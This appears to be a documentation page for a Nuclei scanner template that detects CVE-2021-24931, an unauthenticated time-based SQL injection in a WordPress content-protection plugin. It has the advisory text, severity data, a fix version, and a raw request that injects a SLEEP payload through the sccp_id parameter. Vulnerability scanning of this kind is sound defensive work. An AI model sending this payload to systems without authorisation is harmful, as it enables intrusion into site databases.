WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection
ID: CVE-2021-24931
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
Description
Section titled “Description”WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2021-24931
info: name: WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection author: theamanrawat severity: critical description: | WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: Fixed in version 2.8.2. reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 - https://wordpress.org/plugins/secure-copy-content-protection/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24931 - http://packetstormsecurity.com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2.8.1-SQL-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24931 cwe-id: CWE-89 epss-score: 0.58114 epss-percentile: 0.97428 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
http: - raw: - | @timeout: 20s GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "{\"status\":true")' condition: and# digest: 4a0a00473045022100c251a3b38e3eb88528cffb683fb19a9ba90f5476c4ac58a8ac4ebfde64e7020c022012c41730c99008f35852bbf7dcb9aed8a14b4535623dffc587f6534d9b6a0f6f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24931.yaml"